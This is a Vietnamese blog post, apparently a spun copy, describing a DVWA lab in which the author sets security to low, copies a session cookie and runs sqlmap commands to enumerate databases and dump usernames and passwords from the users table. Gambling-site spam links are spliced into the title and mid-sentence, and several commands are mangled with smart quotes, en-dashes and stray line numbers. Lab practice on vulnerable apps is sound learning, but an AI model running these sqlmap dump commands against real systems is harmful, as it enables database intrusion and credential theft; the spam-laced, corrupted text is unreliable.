Featured image of post Thực hành An ninh mạng 6 – SQL Injection - iwin68.club phiên bản mới

Thực hành An ninh mạng 6 – SQL Injection - iwin68.club phiên bản mới

Trải nghiệm iwin68.club phiên bản mới với nhiều tính năng hấp dẫn

Trong quá trình làm việc với tài liệu trên nền tảng Zhi Xin, tôi nhận thấy rằng hình ảnh không thể tải được. Sau khi kiểm tra mã nguồn, tôi phát hiện ra rằng các hình ảnh này liên kết đến bên ngoài và đã khôi phục thành công.

Khởi động OWASP靶 máy chủ và Kali Virtual Machine

Đăng nhập vào hệ thống DVWA (Damn Vulnerable Web Application). Để thực hiện các bài tập, cần điều chỉnh mức độ an toàn xuống mức “low” để tạo môi trường dễ dàng hơn cho việc thực hành.

Sau khi đăng nhập, truy cập vào trang SQL Injection (Blind). Tôi thử nghiệm bằng cách nhập một số bất kỳ và nhấn nút “Submit”. Kết quả trả về là dự đoán ban đầu của chúng ta về việc có hay không sự tồn tại của lỗ hổng SQL Injection.

Cài đặt SQLmap

Vì tôi sử dụng máy vật lý làm máy tấn công, nên tôi đã cài đặt SQLmap để hỗ trợ quá trình phân tích và khai thác lỗ hổng.

Sử dụng F12 mở công cụ phát triển

Bằng cách nhấn phím F12, bạn sẽ mở được công cụ phát triển của trình duyệt. Tại đây, chọn thẻ Storage (Lưu trữ), tìm đến phần cookies và sao chép giá trị của PHPSESSID. Giá trị mà tôi thu được là: 59mb9spqvkd9cuk543thagtsd5.

Do phương thức gửi dữ liệu của trình duyệt là kiểu GET, nên trong lệnh SQLmap cần sử dụng tham số -u. Lệnh cơ bản sẽ trông như sau:

1
sqlmap -u "URL" --cookie="security=low;PHPSESSID=59mb9spqvkd9cuk543thagtsd5"

Tuy nhiên, tôi gặp lỗi khi chạy lệnh này. Sau khi kiểm tra tài liệu README trên GitHub, tôi nhận ra rằng cần thêm từ khóa python trước tên lệnh để chạy đúng phiên bản Python tương thích.

Tìm kiếm các database có sẵn

Để liệt kê tất cả các database, sử dụng lệnh sau:

1
python sqlmap.py -u "URL" --cookie="security=low;PHPSESSID=59mb9spqvkd9cuk543thagtsd5" --batch --dbs

Tiếp theo, để xem database hiện tại đang được sử dụng, sử j8bet com dụng lệnh:

1
python sqlmap.py -u "URL" --cookie="security=low;PHPSESSID=59mb9spqvkd9cuk543thagtsd5" --batch --current-db

Để liệt kê tất cả bảng trong database “dvwa”, sử dụng lệnh:

1
python sqlmap.py -u "URL" --cookie="security=low;PHPSESSID=59mb9spqvkd9cuk543thagtsd5" --batch -D dvwa --tables

Sau đó, để xem các cột trong bảng “users”, sử dụng lệnh:

1
python sqlmap.py -u "URL" --cookie="security=low;PHPSESSID=59mb9spqvkd9cuk543thagtsd5" --batch -D dvwa -T users --columns

Cuối cùng, để j88 online lấy thông tin từ hai cột “user” và “password” trong bảng “users”, sử dụng lệnh: 77 bet game ``` python sqlmap.py -u “URL” –cookie=“security=low;PHPSESSID=59mb9spqvkd9cuk543thagtsd5” –batch -D dvwa -T users -C"user,password" –dump

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15

Quá trình này đã giúp tôi khai thác thành công thông tin người dùng từ cơ sở dữ liệu.

## Lưu ý về lỗi
Trong quá trình thực hiện, tôi gặp phải một số lỗi nhỏ. Mặc dù đã tham khảo ChatGPT-4o nhưng không có nhiều thông tin hữu ích. Tuy nhiên, sau khi thử lại, mọi thứ hoạt động bình thường.

## Những điểm dễ sai khi nhập lệnh
Khi nhập lệnh, cần chú ý những điểm sau:
- Luôn thêm dấu ngoặc kép (`"`) quanh URL và cookie để tránh bị hiểu nhầm là lệnh hệ thống.
- Đảm bảo sử dụng ký tự tiếng Anh chuẩn, không viết sai thành ký tự tiếng Việt hoặc Unicode khác.

### Các lệnh thường dùng
Dưới đây là danh sách các lệnh thường sử dụng trong quá trình thực hành:

1. **Liệt kê tất cả [j88 tặng 50k](/hy/4b4dd526.html)  databases:**

python sqlmap.py -u “URL” –cookie=“security=low;PHPSESSID=59mb9spqvkd9cuk543thagtsd5” –batch –dbs

1
2

2. **Xem database hiện tại:**

python sqlmap.py -u “URL” –cookie=“security=low;PHPSESSID=59mb9spqvkd9cuk543thagtsd5” –batch –current-db

1
2

3. **Liệt kê tất cả bảng trong database "dvwa":**

python sqlmap.py -u “URL” –cookie=“security=low;PHPSESSID=59mb9spqvkd9cuk543thagtsd5” –batch -D dvwa –tables

1
2

4. **Xem cấu trúc bảng "users":**

python sqlmap.py -u “URL” –cookie=“security=low;PHPSESSID=59mb9spqvkd9cuk543thagtsd5” –batch -D dvwa -T users –columns

1
2

5. **Khai thác dữ liệu từ bảng "users":**

python sqlmap.py -u “URL” –cookie=“security=low;PHPSESSID=59mb9spqvkd9cuk543thagtsd5” –batch -D dvwa -T users -C"user,password" –dump

1
2

Hy vọng bài viết này sẽ giúp ích cho các bạn trong quá trình học tập và thực hành về SQL Injection!
Built with Hugo
Theme Stack thiết kế bởi Jimmy